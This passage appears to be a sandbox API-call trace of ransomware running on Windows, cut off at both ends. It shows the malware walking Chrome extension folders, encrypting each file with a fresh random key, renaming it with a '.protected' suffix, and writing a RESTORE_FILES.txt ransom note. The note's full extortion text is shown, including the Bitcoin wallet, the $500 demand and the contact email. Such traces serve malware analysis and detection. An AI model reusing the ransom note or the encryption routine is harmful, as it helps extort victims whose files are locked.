(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.202] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.202] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.202] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.202] CloseHandle (hObject=0x164) returned 1 [0080.203] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0080.203] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0080.203] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi") returned 141 [0080.203] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0080.203] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0080.203] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*") returned 143 [0080.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.203] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.203] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.203] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.203] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.203] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\.") returned 143 [0080.203] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.203] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.203] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.203] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.203] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.203] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.203] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\..") returned 144 [0080.203] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.203] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.203] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.203] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.203] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.203] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.203] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.204] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.204] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.204] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.204] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.204] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json") returned 155 [0080.204] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.204] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.205] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.205] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0080.205] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.205] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.205] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.206] CloseHandle (hObject=0x168) returned 1 [0080.206] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.protected") returned 165 [0080.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.protected")) returned 1 [0080.206] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.206] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.206] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0080.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.207] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.207] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.208] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.208] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.208] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.208] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.208] CloseHandle (hObject=0x164) returned 1 [0080.208] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0080.208] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0080.208] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN") returned 144 [0080.208] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0080.208] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0080.208] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*") returned 146 [0080.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.208] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.208] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.208] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.208] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.208] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.208] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\.") returned 146 [0080.208] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.208] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.208] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.209] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.209] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.209] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.209] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.209] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\..") returned 147 [0080.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.209] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.209] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.209] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.209] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.209] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.209] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.209] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.209] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.209] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0080.209] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.209] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.210] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.210] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.210] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.210] CloseHandle (hObject=0x168) returned 1 [0080.211] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0080.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0080.211] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.211] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0080.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.211] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.211] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.212] lstrlenA 